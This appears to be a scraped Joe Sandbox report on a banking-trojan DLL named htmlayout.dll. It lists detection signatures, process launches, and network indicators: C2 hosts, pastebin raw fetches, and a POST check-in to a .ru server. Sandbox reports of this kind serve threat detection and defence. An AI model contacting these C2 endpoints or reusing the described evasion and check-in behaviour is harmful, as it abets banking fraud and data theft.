Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
htmlayout.dll

Overview

General Information

Sample Name:htmlayout.dll
Analysis ID:760314
MD5:dcdb484d09c7a99de645eb72c99ef4b7
SHA1:2a52d8f4c2f3eb803b7b0431b9d505ed28e7c6f1
SHA256:d35344f20096889139064c915d3b9b865b81bfa7af97167190c2ebfc7bdf3859
Tags:bankerdllousaban
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
Connects to a pastebin service (likely for C&C)
PE file contains section with special chars
Uses 32bit PE files
One or more processes crash
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
PE file contains more sections than normal
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6000 cmdline: loaddll32.exe "C:\Users\user\Desktop\htmlayout.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6016 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6024 cmdline: rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6108 cmdline: rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6088 cmdline: rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5240 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5248 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5184 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1964 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5192 cmdline: rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 1112 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 408 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.3141.8.197.4249705802833187 12/04/22-22:24:29.608439
SID:2833187
Source Port:49705
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: htmlayout.dllVirustotal: Detection: 42%Perma Link
Source: htmlayout.dllAvira: detected
Source: htmlayout.dllJoe Sandbox ML: detected
Source: htmlayout.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.67.143:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0478E37C FindFirstFileW,3_2_0478E37C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0478E37C FindFirstFileW,5_2_0478E37C

Networking

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 86.48.24.91 2000
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.67.34.170 443
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: pastebin.com
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.20.68.143 443
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 141.8.197.42 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: a0747694.xsph.ru
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.20.67.143 443Jump to behavior
Source: TrafficSnort IDS: 2833187 ETPRO TROJAN Win32/Metamorfo CnC Checkin 192.168.2.3:49705 -> 141.8.197.42:80
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: JAYNETSentiaDanmarkASDK JAYNETSentiaDanmarkASDK
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewIP Address: 104.20.68.143 104.20.68.143
Source: Joe Sandbox ViewIP Address: 104.20.68.143 104.20.68.143
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: POST /serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 153Host: a0747694.xsph.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficTCP traffic: 192.168.2.3:49708 -> 86.48.24.91:2000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: unknownTCP traffic detected without corresponding DNS query: 86.48.24.91
Source: rundll32.exeString found in binary or memory: http://www.indyproject.org/
Source: unknownHTTP traffic detected: POST /serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 153Host: a0747694.xsph.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknownDNS traffic detected: queries for: a0747694.xsph.ru
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/kk8ua858 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: pastebin.com
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.3:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.67.143:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: loaddll32.exe, 00000000.00000002.308414054.000000000178B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: section name:
Source: htmlayout.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756
Source: htmlayout.dllStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: C:\Windows\System32\loaddll32.exeSection loaded: security.dllJump to behavior
Source: htmlayout.dllStatic PE information: Number of sections : 15 > 10
Source: htmlayout.dllStatic PE information: Section: ZLIB complexity 0.9982244318181818
Source: htmlayout.dllStatic PE information: Section: ZLIB complexity 0.9926044592696629
Source: htmlayout.dllStatic PE information: Section: ZLIB complexity 1.0107421875
Source: htmlayout.dllStatic PE information: Section: ZLIB complexity 0.9994483540076335
Source: htmlayout.dllVirustotal: Detection: 42%
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\htmlayout.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElementJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSSJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandlerJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElementJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSSJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerExJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethodJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\128757Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD342.tmp
Source: classification engineClassification label: mal100.troj.evad.winDLL@27/6@9/6
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\gg24UGs6BG
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6016
Source: rundll32.exeString found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exeString found in binary or memory: NATS-DANO-ADD
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-hand-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exeString found in binary or memory: ISO_6937-2-add
Source: rundll32.exeString found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exeString found in binary or memory: NATS-DANO-ADD
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-hand-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exeString found in binary or memory: ISO_6937-2-add
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
